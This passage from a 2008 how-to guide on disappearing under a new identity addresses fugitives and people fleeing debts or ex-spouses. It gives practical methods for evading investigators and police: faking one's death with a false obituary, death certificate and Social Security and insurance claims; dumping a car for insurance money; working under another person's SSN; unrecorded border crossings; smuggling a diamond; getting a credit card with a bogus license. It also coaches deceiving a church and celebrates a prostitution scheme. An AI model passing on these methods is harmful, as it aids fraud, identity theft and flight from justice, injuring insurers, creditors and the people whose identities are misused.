+Ever read about brutal Nazi murderers who slaughtered +thousands of innocent people and then came to the US after the +war and lived perfect lives thereafter. You wouldn't think it possible +but it's happened many times. +The "Funeral Trap" +This one is tough. If you want to protect your new identity, you'll be +unable to attend the funeral of a loved one that dies. Law +enforcement types make it a point to visit funerals in search of +fugitives. Many ex-spouses have been nabbed when they came to +pay their last respects to a deceased parent. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 232 - +Reproduction in any form is prohibited without written permission. + +And you'll need to give some thought to who you want to handle +the funeral arrangements. You simply cannot become involved. To +do so would require you're returning to your old hometown and +attempting to pay for funeral expenses with cash, which would be +very unusual. +Many wanted fugitives overcome with grief will throw caution to +the winds, put on a nice dark suit and dutifully show up at the +funeral only to be spirited away as soon as they step out of their +car. +You simply can't assume that such a sad and somber occasion is +safe. Even sending flowers can be dangerous (if you bought them +with your credit card which is a common practice these days). +Please fill out the registration card +I once knew a nice lady who was, how can I say this, not all that +smart. When a co-worker offered to sell her a brand new color TV +for half it's retail price she quickly snapped it up. The seller told +her with a wink "it fell off the back of a truck!". She just giggled. +After the set arrived, she was sitting there reading the owner's +manual when a bright yellow postcard fell out onto the floor. It was +a registration form that promised that if she registered her +purchase with the manufacturer, she might win a new car. +She filled in the card and mailed it off the next morning when she +got to work. Six weeks later two cops appeared at her door. Not +only did they confiscate the stolen TV, but they also took her down +to the police station where they interrogated her until she broke +down and told them who sold her the hot set. +He got five to seven years. Do not take any appliances with you +that are registered with the manufacturer. If you buy new ones, +promptly throw away any registration cards. +These databases are now available to various types of +investigators. When you take an appliance to a repair depot, they +routinely run the serial number through their database (many +states now require this serial number tracking by law - IBM +pushed for this legislation years ago when they discovered they +could locate stolen IBM typewriters by monitoring those brought +into their authorized service centers). +It would really be a shame to have your VCR blow your cover! +© Copyright 2008, Ariza Research, All rights reserved - ABP - 233 - +Reproduction in any form is prohibited without written permission. + +Getting Rid of Your Car +There are several ways to shed your old wheels. By far the +simplest is to sell it privately for cash. Run a small ad in the paper +or in one of those tabloid style rags that are dedicated entirely to +cars. If you can afford to take your time, you can go for the highest +price possible. +Don’t be shocked if some teenager offers you much more than +you know it’s worth. These things happen. Take advantage of the +situation. Be aware that teenage boys usually have a lot of +problems coming up with the cash. Plan to allow enough time so +that you can take your time. +If anyone asks why you’re selling the car - tell them that you’re +going to work overseas (in Saudi Arabia) where your new +employer (ARAMCO Oil) will be providing a vehicle. +If you want to avoid leaving the impression that you’re planning to +skip town you might want to consider some other alternative ways +of ridding yourself of your auto. One guy I know drove his car into +a sleazy inner-city area at night (with a friend following close +behind). +He parked the old buggy on a dark side street. He then +abandoned the car leaving the doors unlocked and the keys in the +ignition. They drove past it one hour later and the car was already +gone. It didn’t take long. It was probably stripped for parts in a +local chop-shop particularly if it was a 3-5 year old Ford or +General Motors product. (these are the models most often stolen +in the inner city as there is a huge demand for their parts there) +In the cities along the great lakes and Mississippi river, it’s long +been a popular ploy to drive down to a pier along the water, get +out, drop a brick on the gas pedal, reach in and drop it into gear. +Off it goes into the watery depths, never to be found again. The +insurance company pays and never manages to solve the case. +If you’re in a big rush you can usually sell your car to a dealer but +don’t expect top dollar. You’ll probably get about two-thirds of +what it’s worth but at least you’ll get a quick check which you can +then take to the dealer’s bank and cash for - you guessed it - +cash. +How to Buy a Car +Go to one of those shifty "we sell to anyone" - "bad credit no +problem" car lots. They don’t do a lot of in-depth checking of +references as they plan to re-possess the car the first time you’re +a day late with a payment. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 234 - +Reproduction in any form is prohibited without written permission. + +They’ll also charge you the legal limit on the interest. That’s their +racket. But if you keep up your payments, you build good credit +AND have a set of wheels. Be careful though, as these sleazy +dealers tend to sell junky unreliable cars at extremely high prices. +Be as choosy as you can. You want reliable transportation and at +the same time you want a car that is not too similar to your old +buggy. +If you buy a used car privately, be sure to ask the seller if it’s OK +for you to borrow his tags for a day or two so you can go and get +the title switched and get your new tags. Unless the seller is a jerk +this should be no problem. +Car insurance can get tricky here. If you buy from a large new car +dealer you won’t have a problem. They will be so eager for the +sale they won’t care about checking on your insurance. They’ll ask +which company you’re with and then write down your answer. +But, if you happen to live in a state that requires insurance in order +to qualify for the issuance of auto tags, tell the dealer that you just +returned from working overseas (Saudi Arabia) and drove +company vehicles over there so you haven’t had insurance in the +U.S. for many years. An insurance man would see right through +you but the car salesman only wants to get the deal signed and +sealed. +He’ll arrange for an insurance salesman to come to the dealership +and sell you some nearly worthless insurance that will satisfy the +law but will probably never pay you if you file a claim. And, as +you’re in a jam here, you’ll be required to pay premium prices for it +in advance. If you have to, pay up as it’s the only way. +Or if you’re in one of those states where they allow insurance +companies to sell cheap worthless auto policies (Florida has this +ridiculous system), you’re in luck. You can wander in and pick up +an entirely worthless policy for under a hundred bucks which will +legally qualify you for the tags. Ask your salesman, he’ll work it out +I’m sure. +Remember, all he has on his mind is his sales commission. +No matter how long it’s taken to prepare your new life, the +moment you sell your old car and climb into the new one is the +moment you will become that new person. The car is the key to a +new you! +© Copyright 2008, Ariza Research, All rights reserved - ABP - 235 - +Reproduction in any form is prohibited without written permission. + +Killing Off Your Old Identity +The "Flying Saucer" Strategy +The goal here is to leave behind a complete dead end. Slowly but +steadily drain your checking account until the balance goes below +$100. Then just abandon the money. +Throw away your ATM card. Bring all your bills current. Destroy +your credit cards. This is going to hurt but a single credit card +purchase in your new location will quickly bring investigators right +to your doorstep. +Leave your subscriptions to lapse. File a change of address +postcard that forwards all your mail to some hotel in another +region of the country. +Alaska is a favorite as it has many tourist hotels to choose from. +Sniff around the web and you'll find dozens of Alaskan hotels that +would be perfect for your purposes. +This way no mail will be returned to your creditors AND any +investigation of your movements would send the skip-tracer off on +a dead-end search of the frozen Klondike. +A few notes on how skip-tracers and other investigators work. If +you owe money, your creditor will be dunning you with a constant +stream of collection letters and phone calls. +One or both of the following events trigger most skip-trace +investigations. The creditor firm gets a collection letter returned by +the post office labeled as "undeliverable - addressee has moved - +No forwarding address on file" (which means you moved without +leaving a forwarding address) or your phone is disconnected when +they call. +This is usually the result of not paying the phone bill or your +having had the service terminated. Either way, your creditor will +know that the hunt is on and will promptly release the hounds! +But if you overpay your phone bill and include a note stating that +due to an illness in the family you’ll be out of town for several +months and want your phone service to continue uninterrupted, +those nice people down at the phone company will keep your +phone going until the funds run out which could be many, many +months. And with your mail forwarded, they’ll never get any mail +returned. (They will however get a notification of the address +change if they request it) +© Copyright 2008, Ariza Research, All rights reserved - ABP - 236 - +Reproduction in any form is prohibited without written permission. + +I call this the "Flying Saucer strategy" because the result is just as +though a flying saucer dropped down from the sky, beamed you +up and spirited you away. Nothing remains. Your former life is +there for all to see, but where are you? +This is by far the best way to go but can only really be used if you +have the funds to pull it off and don’t have anyone on your trail. An +investigator will review your case, make a few calls and conclude +that you had "no reason for flight." The balance remaining in your +bank account will convince any investigator that you probably +didn't intend to cut and run. +The "African Safari" Strategy +You suddenly develop an intense interest in the Dark Continent. +You let all your friends know. As the story goes, you recently met +someone who went on a safari in Nairobi, Kenya. It was just great +being out there with all those beautiful giraffes, rhinoceroses and +exotic birds. It’s always been your dream to go there. +If you have vacation time on the books, announce that you’re +going to take the plunge and make the trip of a lifetime to beautiful +Africa. +Call a travel agency and buy the cheapest ticket to Nairobi, Kenya +you can find. Be sure to pay with your credit card. Buy a return trip +ticket (if you can afford to) +Again, let all your friends know how excited you are about your +upcoming trip. Maybe you can go out and buy a camera for the +trip or even a fancy hat just like the ones the big game hunters +wear. Apply for a visa from the Kenyan embassy in Washington if +you want to go all the way. Show your friends the visa. +You’ll probably have to wait six or eight weeks for your departure +(sooner departures tend to be rather expensive). But when the big +day comes you drive out to the airport with your camera bag and +hat. You stand in line to get your boarding pass, check one bag. +(Which contains some old clothes you no longer need) You ask +which way to the gate and off you go in that general direction. +When you get to that side of the concourse you duck into the bar, +pocket the boarding pass and wait for your plane to depart. +You then tuck the hat into a bag and return to the parking lot +where you climb into your car and head off to your new life. Or you +can just fly out of that same airport to some other destination on a +ticket purchased in an assumed name with cash. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 237 - +Reproduction in any form is prohibited without written permission. + +Don’t even think about trying to cash in the ticket to Africa. If you +do the whole effect will be spoiled. It’s important that you leave +your apartment looking as though you were only gone for a few +weeks vacation. +If the television and VCR are gone, investigators may conclude +that you have taken flight and will start looking for you in earnest. +(If you're really attached to your TV, you might purchase an older +used unit and leave it behind) +This strategy is not cheap, but it is effective. Anyone, and I include +here both experienced investigators and the law; will draw a blank +on this one if it’s done carefully. Sure it costs quite a bit more than +simply walking away, but for the money you leave behind a stone +cold dead-end trail that ends somewhere in the jungles of Africa! +What does the investigator do when he confirms that you picked +up your boarding pass, checked a bag and that the ticket was one +way? Where does he go from there? If he goes to the +considerable trouble of actually talking to the clerk who handled +your departure, she'll report that you were there and obtained your +boarding pass. From there it’s a total dead end. +Even if he suspects that the whole thing is a ruse, he’ll attempt to +verify your arrival in Kenya. After some months of correspondence +he’ll probably discover that you didn’t arrive. But since the plane +stopped in London and/or Athens enroute you might have +deplaned there and since England and Greece don’t require visas, +he’ll have nowhere left to look. +Those long distant overseas phone calls can be expensive and an +investigator can’t expect the same level of cooperation from +foreign officials that he can here in the US. +As a last touch, leave behind a nice color picture book of Africa in +your top desk drawer where someone is sure to find it. Place +another on your apartment coffee table. This plan will work +perfectly, provided you don’t do anything stupid thereafter. +The "Wild Goose-chase Through the Ghetto" Strategy +On the eve of your departure, take your wallet, complete with old +drivers license, credit cards and a little cash and just drop it in the +middle of the street at midnight in front of a sleazy nightclub in the +shabbiest part of town you can find. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 238 - +Reproduction in any form is prohibited without written permission. + +Trust me - someone will find it and use the credit cards or sell +them to someone who will. Anyone trying to find you will then be +sent on a real "wild goose chase". He’ll see lots of scattered credit +card activity but it won’t lead him to you - that’s for sure. While +he’s trying to make sense of it all, you’ll be off to a new life in a +distant city. +Or you can shed both your old identity and your old car at the +same time. Park your car along a ghetto street at night, leave the +driverside door unlocked, the keys in the ignition AND leave your +wallet on the front seat. You’ll be killing two birds with one stone. +There's always on thing you can depend on in this life, the greed +of your fellow man. +The "Kill Yourself Off " Strategy +Now we move on to the really illegal stuff. This tactic is against the +law so - don't do it! I can almost guarantee you that you’ll end up +in jail should you try this particular ploy. +One lady called her local paper, posed as her own sister and +placed an obit on herself! When they asked for the funeral home +that would be handling the "showing" she said that, as requested +in her will, she was cremated and that no funeral would occur. +Since she died "after a long illness", she included a note in the obit +that contributions should be made to the U.S. Cancer Society. +She then walked into a large hospital and asked where she could +get a death certificate. When she got to the right person she just +asked for one on the pretext that her mother had died in a rural +area and the police needed a copy for their records. +Although it’s a minor crime to provide the blank form, the clerk +handed one over without question (I’ve known several people +who’ve successfully obtained blank death certificates this way +despite the legal restrictions). +She then filed a fake death certificate on herself (another illegal +act) and then used the death certificate to file for a claim for her +death benefit with the Social Security Administration (a federal +felony), which got her entered into the publicly available social +security death database. +On paper she was then completely dead. Her husband collected a +cool $100,000 from their life insurance (yet another illegal act +which took over two years as they had no dead body). The +insurance company was suspicious, but since the public image of +the insurance industry is of prime importance, they eventually paid +in full. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 239 - +Reproduction in any form is prohibited without written permission. + +She left behind a ton of debt that evaporated when her creditors +discovered that her estate was penniless. She and her husband +met several times a year in the Caribbean and during one of those +visits, they were both arrested. +This approach constitutes a series of federal felonies, which +almost always results in a long jail sentence. +Here’s one obvious strategy that is guaranteed to fail. Insurance +investigators always have a good laugh when someone fakes +jumping off a bridge. They leave behind their car, a wallet and a +suicide note. +Problem is, less than a quarter of alleged jumpers actually die and +leave a dead body behind. Don’t expect anyone to believe such a +story. And be assured that your life insurance will never pay off on +such a claim. +The "Canadian Crossing" Strategy +You charge an airline ticket to Canada on your credit card in your +old name and fly on up to Toronto or Montreal. Check into a hotel +and take a look around (it’s a lovely country!) and then rent or buy +a car in your new name, which you then drive back across the +border somewhere out west where the border is very poorly +manned. +You should be able to just drive across at one of the unprotected +crossings on the smaller back roads. The Montana/Canada border +is a good area for this. You might have to stop and show your +driver’s license to the Canadian Mounties. Either way nothing gets +entered in a computer so you were never there as far as an +investigator is concerned. +Take your birth certificate with you just in case but don't offer it +unless asked. Most of the time they won't bother to ask if you +sound like an American and are dressed well. +You only have about 2,500 miles of border to choose from. This +strategy works best during the legal hunting season when +hundreds of eager hunters cross back and forth into and out of +Canada from the adjoining US states. This way you go on the +record as having gone to Canada but no record exists of your +return. +You come back "laundered" and ready for a new life. Anyone +attempting to track your movements will be left wondering when +you'll come back from Canada! +© Copyright 2008, Ariza Research, All rights reserved - ABP - 240 - +Reproduction in any form is prohibited without written permission. + +I’ve also heard of some who have hitch-hiked across with no +problems. One guy posing as a nature photographer caught a lift +from a friendly hunter who didn’t relish driving back to Detroit +alone. +Just remember to dress the part. You want to look straight and +clean cut. If you're young, have long hair or drive a wreck of a car +be prepared to be stopped and even searched. +If you’re crossing during hunting season, dress like a hunter. +During other seasons you’ll want to dress in a suit and tie and be +sure the car is spotless inside and out. The make and model of +your car can get you stopped. Large US made cars are suspect +because their trunks are large and are popular with drug +smugglers. (have you ever seen the trunk on a Ford LTD - it’s +really huge!) +A late model foreign car will do nicely, or better yet a rental car is +perfect though they can be very expensive when you drive them +one way because the rental firms charge a very hefty "drop off +charge" for rentals that aren't returned to the original site. +If you’re black or Hispanic your odds of being searched skyrocket +especially if you're younger. You can reduce the odds somewhat +by having a wife and small child with you. +Here is a common ploy used by Americans that work overseas. +According to US tax regulations; overseas workers pay no US +federal taxes on the first $70,000 they earn overseas provided +they do not spend more than 100 days per year visiting the United +States. +So they fly from their overseas worksite to Toronto on their +passport and then cross the border into the US using only their +driver’s license as proof of citizenship. When they desire to return +overseas they reverse the process and fly out of Toronto using +their passport. +Anyone inspecting their passport will discover that they spent +several months in Toronto and nothing more. They spend as long +as they like in the US and protect their income from taxes at the +same time! I don’t expect this situation to change anytime soon as +the Canadian border (unlike the Mexican border) is of little interest +to either government. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 241 - +Reproduction in any form is prohibited without written permission. + +The "Overseas Worker" Ploy +You’ll find ads in the larger city newspapers offering to find you +work overseas. They mostly offer professional caliber positions for +engineers and doctors. +But some are on the lookout for English instructors for contract +positions in the Far East and particularly Japan. If you’re +adventuresome this might be just the ticket. It gets you out of the +country for two years or longer. +You’ll be required to sign a contract and may be required to +submit to a complete physical exam with their physician. Be sure +that you intend to stay overseas for the full period of the contract +as an early return may be very expensive. Most of these contracts +include painful penalties for breaking the contract by returning +early. +One note though. Don’t pay an up-front fee to any of these so- +called employment agencies. Many are notorious rip-off artists. +Find the ads that just offer listings of the jobs available. And if the +position requires a degree, call them anyway. They may be +shorthanded - you never know. +Saudi Arabia hires a wide range of instructors. If you have +experience working in a sheet metal shop, doing auto bodywork, +have done any kind of aviation mechanical work or know how to +install phones you may be able to find a lucrative position teaching +our Saudi friends. +Saudi Arabia is a nice enough place to live and work. The pay is +great but don’t bother going there if you love booze or movies. +Both are against the law there. (That doesn't mean you can't get +them, it only means it's more difficult and more expensive) There’s +some booze around but not all that much as booze is technically +illegal in Saudi Arabia. +Don’t even think about trying to smuggle booze or drugs into +Saudi Arabia. While the Saudis tend to be a bit more liberal when +it comes to enforcing their strict laws in the areas where +Americans live, they tend to be really strict about drugs and the +penalties they hand out are really frightening (how would you like +to have your hand cut off?) +Most of these overseas job locator services will have a number of +listing for teachers to teach foreigners the English language. +Some will require a college degree in English but many won't. If +you're well spoken you should be able to find a job somewhere out +there. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 242 - +Reproduction in any form is prohibited without written permission. + +The "Cult Membership" Strategy +Browse around the Internet and you’ll find many religious cults +who have web pages designed to convert people to their way of +looking at things. If you live in the east, find one out west. If you +live out west, find one back east. Get as much info as you can +about the cult. You want a real cult. One that is secretive and +strange but not actually dangerous. Send away for information. +You can tell your friends and co-workers that you’re going to join +up. Or if you can handle the experience, you might want to +actually join up, get a membership card and the whole works. +Then tell all your friends that you’ve found "the meaning of life". +They’ll think you’re nuts but who cares? Tell everyone about how +you’re going to visit your new cult friends for a brief visit. Go +ahead and tell them where the cult is located. +You go and you don’t come back. In fact, you spend a day or two +with your new fellow cult members and then split for parts +unknown under your new identity. Anyone looking for you will +easily track you to the cult but that will be the end of the line as no +further information will be available. +Cults are notorious for not revealing anything - unless ordered to +by a court and even then they will have their lawyers legally +challenge the court order. No one short of a cop with a search +warrant will be able to find out if you are actually there or not. And +even then they’ll probably have to fight the cult in court before they +get access. +Also, some cults are famous for regularly moving all over the +country in an effort to evade investigation and/or media attention. +Every cop knows that some cults will move the target member +before the cops return. +It maybe illegal but it’s a common ploy with these outfits. +I know two people who actually joined the Scientology cult in an +effort to vanish. One warning, the Scientology people can be quite +dangerous so this particular cult should not be played with. But +you can visit them, join and then split though they’ll try very hard +to get you back. +But if you travel under you new name after you leave they’ll never +find you. If you let the Scientologists know your new name, they +will pursue you forever. For that reason you should join them +under your old name and never reveal your intention to split to +anyone in the cult. You can be sure they will be watching you +carefully and monitoring your attitude so you'll have to very clever. +Just convince them that everything is fine and then pick your +moment and vanish. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 243 - +Reproduction in any form is prohibited without written permission. + +Investigators and skip tracers know that there’s little use in +contacting a real cult. Their inquires will be ignored and they know +that if they become insistent or threatening, the cult’s attorney will +step in. And cults can often afford the best legal talent available so +legal threats are of little use. +Besides most genuine cults have stripped their members of any +and all wealth they may have had when they signed up. So if +you're not sure you can withstand their psychological +brainwashing - stay away. +Run Off and Join the Circus +Perhaps when you were younger you had a dream about running +off with the circus. Well now might be just the time to re-visit that +childhood dream. +An old friend recently reminded me that anyone seeking to vanish +ought to take a look at the "amusements" industry. +Every year at the same time (usually sometime in the summer) +you’ll notice various "amusement" companies that breeze into +town, set up a smallish fair which they run for a week or so and +then move onto the next town. +These outfits almost always need laborers and electricians to help +with the setup and tear-down. They usually run a small classified +ad in a local paper. The best tactic is to show up during the last +day of their operation, ask to see the boss and ask if they need +help with their "teardown". +If they hire you, work hard and don’t complain. When they pay you +off, ask if they might need another hand out on the road. You can +tell them that due to the recent death of your spouse you’re free to +travel. +The job they may offer might be that of a "ride monkey". You help +with the setup and teardown and also man one of the many rides. +A warning: this is not an easy life. Some of these companies will +pay to put you up in a local motel complete with a private bath and +air conditioning. But others will require that you sleep in an un-air- +conditioned trailer with only a shared mobile shower/restroom. It’s +kinda like camping out all summer. If you’re really attached to a +luxurious lifestyle, the "carny" life may not be for you! +But one thing I can guarantee. You will be properly and completely +lost for the summer. No one will be able to find you no matter how +hard they look. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 244 - +Reproduction in any form is prohibited without written permission. + +Many of these companies don’t ask questions of their employees. +Many pay their people in cash so you can be sure you’ll be +rubbing shoulders with other freedom-loving souls. +Most will ask your name and then write it down without any +reference to identity papers. The pay may not all that great either +as they know that you need this kind of work and so are less than +generous. +Magazine Subscriptions +If you scout around any major newspaper's want ads you may find +some jobs listed under "Magazine Subscription Sales". These +companies hire supervisors who travel the country in a stretch van +with a small crew of teenagers who sell magazine subscriptions +door to door. +Be warned however that some of these outfits are out and out +scams. They use these wholesome looking kids to sell +subscriptions (or some other useless product) under the guise that +the youth is selling magazines so they can go to college, for some +innocent sounding religious organization or for a famous charity +(usually one that benefits poor or sick children). +The hours are long, there are plenty of hassles (this whole +approach is becoming less and less viable given some recent +media attention) but the income can be very good and you will be +roaming the entire country so finding you will present quite a +challenge. +Once again, these employers know that the kind of people this +industry attracts aren't the cream of the crop. Many pay their staff +people in cash and won't even bother to ask for identity +documents. +This might be just the job you need if you can find an honest +company and can put up with the inevitable problems that go +along with managing a group of teenagers. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 245 - +Reproduction in any form is prohibited without written permission. + +Your Appearance +Here are some aspects of your appearance that can substantially +alter your overall appearance: +Gain or lose weight (very effective) +Changing your hair color (effective) +Changing your eye color with contact +lenses (subtle) +Changing your hair length (effective) +Covering up baldness with a "rug" (very +effective) +Adding or removing tattoos (very +effective if visible when fully clothed) +Plastic surgery (if you can afford it - +extremely effective) +Establishing Yourself in Your New Community +There are those who feel that upon arrival in a new community an +identity-changer should immediately get in contact with an +underground group of some sort. Over the last few years the +papers have carried stories of fugitives being arrested after +showing up at one of these supposedly clandestine meetings. +The sad truth is that either the local police has penetrated most of +these groups or, if the government feels they warrant the +attention, the FBI itself has moved in. You don’t know these +people. Why should you trust them with your future? There’s a +better way. One that keeps your story private. +By far the quickest way to establish yourself in a new community +is to join a church. The best bet would be to join one of those +hellfire-and-brimstone "born again" Baptist congregations. +Find a medium to small church with a lot of younger families. If +you’re like me you can’t stand these idiots, but you only need to +attend for a few Sundays, chum up to several of the parishioners +and you’ll quickly have several impressive personal "references" +for immediate use. +The game here is to pretend to believe exactly as they do. Listen +carefully during their services. Every church has it's very own +interpretation of just what "real" religion is supposed to be. What +do they concentrate on? Try to identify the unique features of their +doctrine. Pretend to swallow their "line" completely. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 246 - +Reproduction in any form is prohibited without written permission. + +If they have an "alter call" - join in the procession. Get down on +your knees. After some solemn prayer they’ll ask you to stay to +receive some literature and have a chat. Tell them that your +Grandmother was a Baptist. Ask them where you can buy a bible +(they’ll probably give you one free!). +If they mention a Christian bookstore, be sure to visit it and spend +some money. Tell the clerk that you are new in town and a "new +Christian". Buy any book(s) they might recommend. Study them +and learn the lingo. +The next week return to the same church and ask to become a +member after the service. If they don’t offer a church membership +card, ask for one. No matter how ridiculous their beliefs sound to +you, agree with them and listen to their explanations with rapt +attention. +Ask the obvious questions without challenging them in any way. +Bond with them as best as you can without being too obvious. +After a few encounters they will fall in love with you and think +you’re a wonderful person. +Chances are some fellow church member will invite you over to +their house for "fellowship." When they ask about your family tell +them that your parents are "lost in the darkness". +If you have a hard luck story (maybe you were on drugs or were +forced to join a satanic gang) that ends with you being saved by +Jesus - they will eat it up! Remember, most rational people reject +this narrow-minded theology, but you’re different. You understand +them and agree completely with their beliefs. +Here’s the secret about this tactic: From then on your fellow +church members will tell others that you’re "nice" because you +believe as they do, not because they really think that you’re all +that nice. Attend church social activities. +Find someone particularly friendly and ask them to refer you to an +apartment where you plan to live until you can afford to buy a +place of your own. Tell them that you don’t want one of those +sinful apartment complexes. We all know about all the sinful +activity going on there and you, being a good Christian, want none +of that. You want a nice clean "Christian" place. +If they don’t know any "born again" apartment owners, they’ll call +around until they find something for you. With a little luck this +church gambit may just land you a nice apartment with a landlord +who will be so happy to get a clean-living religious tenant that he’ll +ask very few questions. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 247 - +Reproduction in any form is prohibited without written permission. + +Be generous with the tithing and other contributions if you can +afford to. The preacher will always have something nice to say +about anyone that forks over cash for the church "building fund". +Most of these guys are as profit oriented as your average used car +dealer! +Some Final Random Thoughts +During the San Francisco earthquake a local news station was +filming a burning building. When they swung the camera around to +show the crowd, about a dozen men broke from the crowd and +ran. They were all probably wanted by the police (or their ex- +wives!) Stay away from cameras. +Don’t do any unnecessary driving as it exposes you to the +possibility of a traffic stop by the police. Be aware that for the first +six months or so your new identity will be rather fragile and might +not stand up to close scrutiny. As time passes your persona will +"firm up" as you build a real history in your new name. +After a year - you are the new you. During a recent interview the +director of the FBI revealed that most fugitives get caught during +the first 90 days but those who manage to live under a new +identity for a full year are seldom found. +This all may sound like a very demanding and difficult project. And +in some ways it is. But hidden in the midst of all this planning and +worry is a golden opportunity to start all over. There are a +thousand ways to screw up a life so I can only imagine what +happened to your original identity. But now you have what others +dream of - a real chance to live out your fantasies. +Seize the chance, as it may be the greatest turning point of your +life. It strange how some identity-changers go on to live happy and +successful lives while others never get it right and spend their +nights tossing and turning in the fear that "Big Brother" will soon +appear. The most valuable thing I can think of to say at this point +is that IT CAN BE DONE! Don’t let anyone tell you otherwise. +If you presently have an established career, relocating under a +new name can be a daunting prospect. One identity-changer was +a Registered Nurse. To escape her abusive and unrelenting ex +she changed her identity and relocated to a distant city. Problem +was she was in a licensed profession. Her answer was to go back +to school at age 42. +She breezed through the courses and challenged many others. +Instead of taking three years, she did the whole thing in half that +time and was licensed under her new name. Now she enjoys a +good salary and a solid career, the one she loves. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 248 - +Reproduction in any form is prohibited without written permission. + +One recent identity-changer asked that we pass along this little tip. +He and his wife were planning on starting anew in the US after +leaving their east European home. They obtained US tourist visas +but were shocked to learn that they were only allowed to take +about $500 each with them in cash. That’s hardly enough to start +a new life. +To get around this little problem, they slowly liquidated their +possessions until they had a nest egg of around $80,000. Through +friends they were able to locate a diamond merchant who sold +them a nice 14-carat Russian diamond of very high quality for +cash. They then smuggled the gem into the US in the wife’s +vagina. After arrival, the bauble was sold for $60,000 in cold hard +US cash that allowed them to successfully launch their new lives. +(The diamond merchant back home wasn’t all that honest it would +appear!) +A diamond will allow you to concentrate an enormous amount of +wealth into a very small space and is also highly liquid anywhere +in the world. Others have done the same thing with small but +valuable antiques (those little wooden Russian dolls have been +used by Russians) that can be easily hidden in your underwear. +It’s often hard to keep employment as the social security +withholdings are reported on a quarterly basis. Many wanted +criminals find that they are forced to change jobs every three or +four months to stay ahead of the dreaded letter from the social +security people advising their employer that one of their +employees has two jobs, one in Oregon and the other in Florida! +One common strategy is to work for a temp service. +You use someone else’s SSN and an assumed identity. These +outfits have so many people going through their revolving door +that they seldom do much investigating. You can work for at least +several months. Move around from office to office so no one gets +too inquisitive. But I would ask you not to use this ploy because it +gets the actual holder of the social security number in trouble with +the social security people. It can take a year or more to get such a +mess straightened out! +Popeye the Sailor Man… +A freshly divorced friend wanted to get completely and utterly lost. +Let’s just say that he did not want to communicate with his ex. On +a whim he spent his last few bucks on a one-way ticket to sunny +Ft. Lauderdale, Florida. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 249 - +Reproduction in any form is prohibited without written permission. + +There we took to wandering the many yacht marinas that dot the +coast. After a week he managed to find a position doing some +renovation work on a boat owned by a rich dentist who lived up +north. +It was an ideal job for someone in need of anonymity. In one fell +swoop it provided him with a steady source of income and a nice +comfortable (and completely untraceable) place to live. +And even better, when the dentist would come down for his thrice +yearly sailing outing, my friend would "crew" for him and spend +two weeks sailing the Caribbean. When the owner wasn't around +he would tell women that the boat was his. They were very +impressed and responded accordingly. Not a bad gig! +Also, my friend would take the boat out for daylong cruises, which +he advertised, in the local paper. He posed as the owner of the +boat and charged his day passengers hefty fees, which they were +only too happy to pay. +Then one night he hit the mother load. When my friend had a few +extra bucks in his pocket, he was known to spend a few idle hours +in a local topless dancing establishment. There he met a foxy lady +named Tiffany. He happened to be chatting to Tiffany the night +before one of his unauthorized cruises. When he revealed his little +scheme +Tiffany suddenly became quite interested. He told her that he +wasn’t much looking forward to spending the next day in the +company of several old businessmen. Tiffany said that she would +just love to take that cruise as she was sure a good looking +hooker like herself could do some serious business with his +passengers (presumably while cruising out beyond the three mile +limit where law enforcement doesn't exist). +They put together a deal. Tiffany and a dancer friend would go +along for the cruise. They agreed to kick back one third of the illicit +money they made to my friend. +The next morning six paunchy businessmen came aboard. Then +the two girls showed up clad only in lovely (though scant) bikinis. +The girls were turning tricks before they even cleared the port! In +all, the two girls earned three hundred each, which put two +hundred in my friends hot little hand. +The girls were happy, my friend was happy and the passengers +were also happy. (in fact they were extremely happy!) And to +make things even better the passengers provided my friend with a +generous tip! +© Copyright 2008, Ariza Research, All rights reserved - ABP - 250 - +Reproduction in any form is prohibited without written permission. + +Today my friend owns his own 50-foot boat. His "Erotic Night +Cruises" are a big hit - and his wife? She’s still looking for him! +This entire story is true. Just thought you might find it interesting. +How to Export Your Money Privately +There are many different ways to take your money with you when +you leave the good old USA. You could just go and get yourself a +bank draft or a cashier’s check. This approach is OK provided +each one is for less than $3,000 (bankers now report all +transactions over $3,000 to the government) +Many have used checks drawn on a money market account. This +leaves a trail behind but that trail dries up when the money market +account is closed. +Using a personal or company check would be very foolish as it +leaves behind a very traceable paper trail. Secured credit cards +are good. You can obtain one in the US, deposit a sizeable sum +into the secured account and then wander the globe spending as +you please. You can make purchases freely or get cash from ATM +machine worldwide. +It’s best if you can manage to get one in another name by using a +bogus drivers’ license. Or better yet get one from a Caribbean +bank supported by an "offshore" account that will provide you with +the ultimate in privacy/security. +Traveler’s Checks can be used for smaller sums (less than $3,000 +per purchase). Purchase too many at a time and you can look +forward to increased scrutiny. +One rather resourceful fella I know discovered a very clever way +around the currency export limitation. He bought a full-fare first +class return airline ticket to his overseas destination. +He then flew there using the first half of the ticket. He then +changed his plans, cancelled the return portion of the ticket and +requested a cash refund that the airline was only too happy to +provide (they tend to take very good care of their first class +customers!). This enabled him to quietly export several thousand +dollars in cold hard cash. +Travel Warning Update: +Several weeks ago I was returning to the US after two weeks in +eastern Europe. When I cleared passport control I overheard an +ominous conversation. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 251 - +Reproduction in any form is prohibited without written permission. + +It seems that an individual who had arrived on the same flight was +being detained. His sin was a simple one. He had failed to file a +tax return for the two previous years. He had been living overseas +and didn’t feel the need to file. But today it seems that the reach of +the IRS now includes the entire planet! (We’re the only country +that still taxes it expatriate citizens) +I had been hearing rumors that the IRS was beginning to put out +lists of those who fail to file. My sources tell me that the IRS +creates a master list of names taken from school records. They +then remove those who have death certificates on file. +Next they remove those who filed returns last year. What’s left is a +list of people who are presumably still alive and for whatever +reason are not filing returns. I knew the government was doing +this but until now I wasn’t sure how the information was being +used. Be careful! Be sure you’ve filed if you expect to enter this +country through a main entry point. +Another Warning Concerning Travel: +An old high school friend of mine is well, rather a paranoid type. +He has never trusted our federal government and today is +completely convinced that Washington is bent on devouring our +personal freedoms. So when he planned to take a trip to 